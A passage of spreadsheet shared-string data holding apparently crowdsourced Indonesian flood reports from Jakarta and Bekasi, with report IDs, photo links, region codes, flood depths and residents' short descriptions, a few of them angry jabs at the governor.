    <t>Plzzzzzzzz help di harapan indah bekasi</t>
  </si>
  <si>
    <t>9b6281bd-71b6-427b-8e2b-fb9a90eccf9c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9b6281bd-71b6-427b-8e2b-fb9a90eccf9c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "659", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Terjadi genangan sekitar 5 cm, yg berasal dari rembesan ubin..</t>
  </si>
  <si>
    <t>3f54c0a4-8ba1-4308-b9ce-741555344d8b</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 4 }</t>
  </si>
  <si>
    <t>Sudah 5 jam hujan besar, daerah saya memang tidak kena banjir, belum tau sekitar saya, DAS ciliwung dekat dari sini, besok baru kelihatan</t>
  </si>
  <si>
    <t>996a33da-6663-4ed8-8b1f-8ecf4f2786dc</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1433", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Komplek Pulo Gebang Permai</t>
  </si>
  <si>
    <t>68b37fcd-a582-4160-aefb-4b2b3fd7427e</t>
  </si>
  <si>
    <t>Banjir terparah di harapan indah</t>
  </si>
  <si>
    <t>ec5cee2d-7c16-4316-b354-27fd053b2b43</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2675", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di jalan harapan dua kalimalang, cipinang melayu, jakarta timur</t>
  </si>
  <si>
    <t>b41f0a0e-b900-4491-8b9e-d1eedac5703d</t>
  </si>
  <si>
    <t>Pulogebang permai banjir,saluran air tersumbat</t>
  </si>
  <si>
    <t>488ce0d7-ae24-4b65-8376-6db3dd028363</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1509", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sedengkul diluar</t>
  </si>
  <si>
    <t>Ujung Menteng</t>
  </si>
  <si>
    <t>145b723e-efc3-494c-b624-522c40511855</t>
  </si>
  <si>
    <t>https://images.petabencana.id/145b723e-efc3-494c-b624-522c40511855.jpg</t>
  </si>
  <si>
    <t>Banjir di dalam rumah, sudah 5 cm. Di luar sudah 40-50 cm</t>
  </si>
  <si>
    <t>35f3441d-3908-489f-b71f-0a18d05640a1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/35f3441d-3908-489f-b71f-0a18d05640a1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "533", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di daerah GALUR kec. Johar baru jakarta pusat, Mohon bantuannya segera, air sudah mulai masuk ke rumah2 warga</t>
  </si>
  <si>
    <t>Galur</t>
  </si>
  <si>
    <t>c83e1831-224c-4145-a615-1e82514856e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c83e1831-224c-4145-a615-1e82514856e8.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 63, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Gubernur goblok, besok wawancara ketawa ketiwi, mampus aj lu. Setan. Gk becus kerja mundur. Pny staf ahli makan gaji buta kalian. Asw!</t>
  </si>
  <si>
    <t>53d760b0-3e0f-4414-83ff-4e66c0c75c44</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2652", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>air terlihat bening, sepertinya banjir dari air got</t>
  </si>
  <si>
    <t>515f72bf-0781-45ea-8f3f-e3af54d57484</t>
  </si>
  <si>
    <t>https://images.petabencana.id/515f72bf-0781-45ea-8f3f-e3af54d57484.jpg</t>
  </si>
  <si>
    <t>Jakarta kebanjiran</t>
  </si>
  <si>
    <t>36465b54-01df-4b14-b80e-9c838a04ab6a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36465b54-01df-4b14-b80e-9c838a04ab6a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1925", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sepinggang orang dewasa</t>
  </si>
  <si>
    <t>1683d720-d58c-4ab5-a277-75b14009d6b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1683d720-d58c-4ab5-a277-75b14009d6b1.jpg</t>
  </si>
  <si>
    <t>Banjir di DI Panjaitan</t>
  </si>
  <si>
    <t>99429dc6-78ac-45fb-a987-6b08cec5f589</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99429dc6-78ac-45fb-a987-6b08cec5f589.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2047", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ini foto didalam rumah, kalau di jalan setinggi lutut orang dewasa</t>
  </si>
  <si>
    <t>e009535a-0458-4862-aba4-3d97e0887847</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e009535a-0458-4862-aba4-3d97e0887847.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 102 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1735", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>04f18c14-7a5b-4910-8346-9d918e0f4055</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04f18c14-7a5b-4910-8346-9d918e0f4055.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1763", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2e096ec7-0dba-45f3-9cc2-d72b2295061f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e096ec7-0dba-45f3-9cc2-d72b2295061f.jpg</t>
  </si>
  <si>
    <t>Banjir PGP</t>
  </si>
  <si>
    <t>6d8450ea-4c89-4bd5-9097-3f76e04a4baf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6d8450ea-4c89-4bd5-9097-3f76e04a4baf.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "750", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Paseban</t>
  </si>
  <si>
    <t>Senen</t>
  </si>
  <si>
    <t>9036c9ae-a45f-4a59-8cfe-5e961f53d566</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9036c9ae-a45f-4a59-8cfe-5e961f53d566.jpg</t>
  </si>
  <si>
    <t>P.U.P SEKTOR V KELURAHAN BAHAGIA, KECAMATAN BABELAN, KABUPATEN BEKASI. KIRA KIRA BANJIR SELUTUT ADA YANG BANJIRNYA DR LANTAI 2 UDAH MASUK</t>
  </si>
  <si>
    <t>f2d86e54-5199-4f47-8f41-29f1484ba103</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2d86e54-5199-4f47-8f41-29f1484ba103.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 147 }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-BT" }</t>
  </si>
  <si>
    <t>Panunggangan Barat</t>
  </si>
  <si>
    <t>Cibodas</t>
  </si>
  <si>
    <t>16ccd626-089a-4584-939a-2cff9218a834</t>
  </si>
  <si>
    <t>https://images.petabencana.id/16ccd626-089a-4584-939a-2cff9218a834.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1741", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir karna tergenangnya air kiriman hujan yang lumayan besar, semoga pagi ini surut</t>
  </si>
  <si>
    <t>7532f623-1744-4471-b9b0-7febc4b79092</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7532f623-1744-4471-b9b0-7febc4b79092.jpg</t>
  </si>
  <si>
    <t>Banjir untuk daerah pondok ungu permai</t>
  </si>
  <si>
    <t>c299e60e-2a43-4864-a2e3-c2f4f588965f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c299e60e-2a43-4864-a2e3-c2f4f588965f.jpg</t>
  </si>
  <si>
    <t>875c4ba9-f81e-4790-9b1b-6a763d438cf7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/875c4ba9-f81e-4790-9b1b-6a763d438cf7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2301", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Curah hujan tinggi yang menyebabkan bajir, listrik sudah padam beberapa saat lalu</t>
  </si>
  <si>
    <t>7049c12d-7d66-41b4-b364-b071b89b0f05</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "849", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tebet timur dalam banjir</t>
  </si>
  <si>
    <t>Tebet Timur</t>
  </si>
  <si>
    <t>5692201d-da40-47e2-a208-5d2ecc586760</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5692201d-da40-47e2-a208-5d2ecc586760.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1684", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah mau masuk garasi rumah</t>
  </si>
  <si>
    <t>30caecab-7e83-43bb-98c5-5fba0b41114e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/30caecab-7e83-43bb-98c5-5fba0b41114e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2120", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>09c3f151-489e-41e3-b6a4-144b76fe4d54</t>
  </si>
  <si>
    <t>TAMAN HARAPAN BARU</t>
  </si>
  <si>
    <t>c50dbb36-2931-432e-bb93-db7135116793</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c50dbb36-2931-432e-bb93-db7135116793.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "925", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air cukup tinggi setelah hujan sekitar 6 jam</t>
  </si>
  <si>
    <t>Pal Meriem</t>
  </si>
  <si>
    <t>8607aa68-a7e6-4f2a-8bca-9d930774ae4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8607aa68-a7e6-4f2a-8bca-9d930774ae4e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "480", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jalan percetalan negara, gang pancing rawasari</t>
  </si>
  <si>
    <t>98d89e67-364d-4838-938c-f6b07f773742</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98d89e67-364d-4838-938c-f6b07f773742.jpg</t>
  </si>
  <si>
    <t>Banjir lebih parah dari banjir tahun baru . Sampe masuk rumah dan pln mematikan listrik . Mungkin perlu disiapkan perahu karet untuk evakuas</t>
  </si>
  <si>
    <t>7a284961-7cc3-4b5a-a29a-a3157b7942bb</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1703", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan masjid ad dawah Sudah tidak dasarankan dilewati mobil"</t>
  </si>
  <si>
    <t>51fbbffa-beb6-4ec1-92a3-b5106ab01bba</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2626", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pinggir ciliwung</t>
  </si>
  <si>
    <t>3f1b4a8c-3d3d-4678-9295-5ed6b838be0c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f1b4a8c-3d3d-4678-9295-5ed6b838be0c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1221", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir nya parah</t>
  </si>
  <si>
    <t>Klender</t>
  </si>
  <si>
    <t>8f36ec85-643f-4d91-98ff-caca907873fe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f36ec85-643f-4d91-98ff-caca907873fe.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1407", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air mulai naik sekitar Jam 2</t>
  </si>
  <si>
    <t>b034b254-c3fa-4f57-98b4-2a6864d42f4e</t>
  </si>
  <si>
    <t>Banjir sebetis</t>
  </si>
  <si>
    <t>Setia Asih</t>
  </si>
  <si>
    <t>e9504886-f58e-48c1-bb86-a599c29d6d83</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e9504886-f58e-48c1-bb86-a599c29d6d83.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1722", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Otista III Komplek XI, mulai dari jam 1:45 sampai sekarang jam 3:00, ketinggian banjir sudah sekitar 25 CM.</t>
  </si>
  <si>
    <t>6ea2c319-8435-4411-96c7-31e9eee19a38</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1689", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Didepan rumah 70cm, dalam rumah sudah semata kaki lebih</t>
  </si>
  <si>
    <t>1785ea92-cb5f-4ae3-a6ef-6fedcf4ad86c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1785ea92-cb5f-4ae3-a6ef-6fedcf4ad86c.jpg</t>
  </si>
  <si>
    <t>BARU PERTAMA SEUMUR HIDUP SAYA DISINI BANJIR SAMPAI MASUK RUMAH.</t>
  </si>
  <si>
    <t>c9dd6a94-69e1-49c7-b60d-085efe129039</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c9dd6a94-69e1-49c7-b60d-085efe129039.jpg</t>
  </si>
  <si>
    <t>808e75dd-8b6a-431e-bab3-fb60fe8fa82b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/808e75dd-8b6a-431e-bab3-fb60fe8fa82b.jpg</t>
  </si>
  <si>
    <t>Banjir sudah masuk rumah</t>
  </si>
  <si>
    <t>adf93c8a-c410-42c2-a17d-adccba736cd7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/adf93c8a-c410-42c2-a17d-adccba736cd7.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 86 }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "405", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Cempaka putih</t>
  </si>
  <si>
    <t>b9573e1d-12f7-4b88-9173-d3e7d845b2e5</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "293", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Kepu Barat depan kantor Kelurahan Kemayoran</t>
  </si>
  <si>
    <t>f3e47b1c-19af-43c9-baa1-4e0ea0ccf533</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f3e47b1c-19af-43c9-baa1-4e0ea0ccf533.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1974", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>79dfc531-5763-46ef-8494-2a1eb0eb2666</t>
  </si>
  <si>
    <t>https://images.petabencana.id/79dfc531-5763-46ef-8494-2a1eb0eb2666.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "724", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lokasi : Kramat Sentiong, Jakpus</t>
  </si>
  <si>
    <t>Kramat</t>
  </si>
  <si>
    <t>04dbe159-a9ba-4b58-a63e-a8e3f008cfb6</t>
  </si>
  <si>
    <t>Banjir semata kaki di perumahan Janur Elok, Kelapa Gading, Jakarta Utara</t>
  </si>
  <si>
    <t>a9572166-86eb-4459-b271-2eed0237db80</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9572166-86eb-4459-b271-2eed0237db80.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1240", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>3bc96773-7376-45e0-9fde-0b6649765482</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3bc96773-7376-45e0-9fde-0b6649765482.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2117", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>000aba91-3358-4bfe-aa1b-2bf46813fd41</t>
  </si>
  <si>
    <t>https://images.petabencana.id/000aba91-3358-4bfe-aa1b-2bf46813fd41.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1686", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Pondok Bambu Permai blok AH-AG, di jalan setinggi 25 cm, masuk garasi rumah setinggi 10 cm</t>
  </si>
  <si>
    <t>44ceae94-ae98-41f2-b5eb-9ce2fa028338</t>
  </si>
  <si>
    <t>Jalan sudah tergenang</t>
  </si>
  <si>
    <t>8280532c-eb9e-4ef1-b665-1b719202d0e9</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2031", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi lutut org dewasa. Dan hujan blm berhenti juga</t>
  </si>
  <si>
    <t>33c5436f-22f5-4a79-af58-7429fad9b9ca</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 132 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1333", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Di luar rumah banjir sudah seleher orang dewasa</t>
  </si>
  <si>
    <t>Karet Kuningan</t>
  </si>
  <si>
    <t>98e510cf-76c5-4260-87fb-9d9afb59c46b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/98e510cf-76c5-4260-87fb-9d9afb59c46b.jpg</t>
  </si>
  <si>
    <t>Banjir menggenangi di area perumahan komplek DPRD JAKARTA TIMUR dan APARTEMEN SENTRA TIMUR RESIDENCE</t>
  </si>
  <si>
    <t>d6477cf1-210b-4180-ba0e-5ca34f6e3d84</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1897", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah mulai surut</t>
  </si>
  <si>
    <t>Kebon Manggis</t>
  </si>
  <si>
    <t>c9840103-9c6b-45ea-9c9f-f407acded65e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c9840103-9c6b-45ea-9c9f-f407acded65e.jpg</t>
  </si>
  <si>
    <t>Di dalam rah sudah 25 cm. Sudah sama dengan banjir 1 Januari.</t>
  </si>
  <si>
    <t>115edb74-4381-4f85-98c0-e20535cb4be1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/115edb74-4381-4f85-98c0-e20535cb4be1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1947", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Utan Kayu Banjir pagi ini</t>
  </si>
  <si>
    <t>feb0a31b-ac0b-49fc-ad7c-3c78fe0dc349</t>
  </si>
  <si>
    <t>https://images.petabencana.id/feb0a31b-ac0b-49fc-ad7c-3c78fe0dc349.jpg</t>
  </si>
  <si>
    <t>#gubernurterbodoh</t>
  </si>
  <si>
    <t>6916d022-f7a2-4643-879d-fe6c7052401a</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1931", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sepaha orang dewasa</t>
  </si>
  <si>
    <t>1ee9b1b6-8a7b-445b-a9cf-a739ac38ba47</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1ee9b1b6-8a7b-445b-a9cf-a739ac38ba47.jpg</t>
  </si>
  <si>
    <t>Banjir di cempaka putih timur XI B kurang lebih mata kaki bahkan sudah mulai diatasnya</t>
  </si>
  <si>
    <t>6df225f4-ca47-49a2-a6c4-f7f73f54a518</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6df225f4-ca47-49a2-a6c4-f7f73f54a518.jpg</t>
  </si>
  <si>
    <t>banjir diluar rumah sudah sepinggang, di dalam rumah sudah se betis</t>
  </si>
  <si>
    <t>03ff89a8-7123-43d3-b502-e9f922538299</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03ff89a8-7123-43d3-b502-e9f922538299.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 41 }</t>
  </si>
  <si>
    <t>Air terus bertambah tinggi</t>
  </si>
  <si>
    <t>7f5ebf02-359d-4d32-97f0-aab4e652432b</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "844", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tinggi banget, sampe kelelep</t>
  </si>
  <si>
    <t>93fc91a1-6d0b-462e-b53c-d0a9d9987b4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93fc91a1-6d0b-462e-b53c-d0a9d9987b4e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2033", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir masuk rumah. 03.30 WIB</t>
  </si>
  <si>
    <t>bfc28ddc-9a25-4c24-9a5d-9762f8fb0b84</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bfc28ddc-9a25-4c24-9a5d-9762f8fb0b84.jpg</t>
  </si>
  <si>
    <t>Banjir masuk rumah mulai jam 2 tadi</t>
  </si>
  <si>
    <t>b0ef6506-03e1-4959-99c4-acdf2902bb67</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0ef6506-03e1-4959-99c4-acdf2902bb67.jpg</t>
  </si>
  <si>
    <t>3b56cc0c-5642-4f33-9442-e076694221ba</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b56cc0c-5642-4f33-9442-e076694221ba.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1911", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kayu manis 3 RT 17 RW 02, Kelurahan Kayu Manis, Kecamatan Matraman</t>
  </si>
  <si>
    <t>Kayu Manis</t>
  </si>
  <si>
    <t>22430add-2f8c-4e8f-9873-c1b46f6b4f2d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/22430add-2f8c-4e8f-9873-c1b46f6b4f2d.jpg</t>
  </si>
  <si>
    <t>5274ef49-e9da-4b12-9c85-40a12b9dd5b7</t>
  </si>
  <si>
    <t>Semoga huja cepat berenti</t>
  </si>
  <si>
    <t>2a4e2e3c-b9a2-4ffd-9d79-a2645a800097</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2a4e2e3c-b9a2-4ffd-9d79-a2645a800097.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1225", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>169d98bb-fc74-4673-8d5c-e03c6e376707</t>
  </si>
  <si>
    <t>https://images.petabencana.id/169d98bb-fc74-4673-8d5c-e03c6e376707.jpg</t>
  </si>
  <si>
    <t>Jl.kebon Pala 1 , Tanah Rendah Gang 2 RT3 &amp; RT 6 RW07</t>
  </si>
  <si>
    <t>09048dc0-3952-4004-8eef-0d8e432d2e74</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09048dc0-3952-4004-8eef-0d8e432d2e74.jpg</t>
  </si>
  <si>
    <t>9fd73f30-4977-4fb5-9601-4b01c81ed9ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9fd73f30-4977-4fb5-9601-4b01c81ed9ab.jpg</t>
  </si>
  <si>
    <t>Pondok Ungu Permai Blok F</t>
  </si>
  <si>
    <t>Kaliabang Tengah</t>
  </si>
  <si>
    <t>Bekasi Utara</t>
  </si>
  <si>
    <t>0ade54d6-5de3-4467-aaba-8ed335ab65c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0ade54d6-5de3-4467-aaba-8ed335ab65c7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1749", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di gg Monas, Cipinang Pulo Maja, Jatinegara, Jakarta Timur</t>
  </si>
  <si>
    <t>79ceb2d0-24e4-4a34-b3d5-38b451251c87</t>
  </si>
  <si>
    <t>https://images.petabencana.id/79ceb2d0-24e4-4a34-b3d5-38b451251c87.jpg</t>
  </si>
  <si>
    <t>3fd3d2fb-803e-4253-9739-785715222d1f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3fd3d2fb-803e-4253-9739-785715222d1f.jpg</t>
  </si>
  <si>
    <t>Perumahan taman harapan baru, harapan indah, bekasi</t>
  </si>
  <si>
    <t>d7b659c1-597f-4802-bcb0-bcf2a04f254d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d7b659c1-597f-4802-bcb0-bcf2a04f254d.jpg</t>
  </si>
  <si>
    <t>#Banjir di Jl. Semangka I #Jatipulo, Jakarta Barat setinggi lutut orang dewasa.</t>
  </si>
  <si>
    <t>569eb4d8-74ec-479e-b83f-8210f9bc4a41</t>
  </si>
  <si>
    <t>https://images.petabencana.id/569eb4d8-74ec-479e-b83f-8210f9bc4a41.jpg</t>
  </si>
  <si>
    <t>46a9092d-93af-40d6-b8fe-54b1df1bbc80</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46a9092d-93af-40d6-b8fe-54b1df1bbc80.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1883", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>6c6a6213-aae4-418d-b7a1-7ffac74fd369</t>
  </si>
  <si>
    <t>Banjir sebetis dirumah ku, tolonkkkk</t>
  </si>
  <si>
    <t>aabf982b-4bde-495f-aad5-e47ada21e682</t>
  </si>
  <si>
    <t>Di dalam rumah sudah semata kaki, di jalanan 40cm</t>
  </si>
  <si>
    <t>a66e37cf-c9af-45f9-a9fb-90dcdd936e25</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a66e37cf-c9af-45f9-a9fb-90dcdd936e25.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "232", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Motor hampir hanyut tolong segera dikondisikan agaar semua aman dan nyaman</t>
  </si>
  <si>
    <t>52492433-8a91-4bfa-9708-052c55eef4ad</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1690", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>83d529db-f49d-4c15-959d-090b26c475b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83d529db-f49d-4c15-959d-090b26c475b2.jpg</t>
  </si>
  <si>
    <t>Banjir sampai pinggang orang dewasa</t>
  </si>
  <si>
    <t>da39dacd-6349-4012-ba4b-f48986e36a1c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/da39dacd-6349-4012-ba4b-f48986e36a1c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2193", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Jl. Boulevard Raya.</t>
  </si>
  <si>
    <t>3a6fab1e-84ab-4531-9341-1f27ec99fe53</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3a6fab1e-84ab-4531-9341-1f27ec99fe53.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2168", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1b6ea34b-bf4d-4f64-b9a8-65d39205a4d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1b6ea34b-bf4d-4f64-b9a8-65d39205a4d9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1682", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>f1d4935d-d338-42e6-b82d-d6c6fb967ac9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f1d4935d-d338-42e6-b82d-d6c6fb967ac9.jpg</t>
  </si>
  <si>
    <t>Banjir sudah mencapai selutut orang dewasa??????</t>
  </si>
  <si>
    <t>e34a0f7b-d8d4-40c5-897f-0b26c4329d70</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e34a0f7b-d8d4-40c5-897f-0b26c4329d70.jpg</t>
  </si>
  <si>
    <t>Banjir...</t>
  </si>
  <si>
    <t>5c9f6d4c-f20c-4fe1-8242-8429385b9db1</t>
  </si>
  <si>
    <t>Hujan deras dari pukul 23.00 ketinggian air sudah 30cm</t>
  </si>
  <si>
    <t>c9168574-5bb7-4b48-a36e-08b1c2db4323</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1738", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>4a787662-e6c0-43cc-a77d-8e3e12ec6a4d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a787662-e6c0-43cc-a77d-8e3e12ec6a4d.jpg</t>
  </si>
  <si>
    <t>Banjir sepaha org dewasa. Udah 6x banjir di 2020.</t>
  </si>
  <si>
    <t>b46e7df6-5b2c-4133-b728-b350af9dc2f5</t>
  </si>
  <si>
    <t>Mulai naik genangan air menutupi jalan</t>
  </si>
  <si>
    <t>47059075-9c22-4455-8d04-639175ae4c8d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/47059075-9c22-4455-8d04-639175ae4c8d.jpg</t>
  </si>
  <si>
    <t>Banjir, airnya naik lagi. Padahal sudah sempet surut</t>
  </si>
  <si>
    <t>75544dab-91dd-4d8e-aafa-0b5be9565766</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75544dab-91dd-4d8e-aafa-0b5be9565766.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1683", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>6ff87893-6658-4f39-a353-f5dd82d868e7</t>
  </si>
  <si>
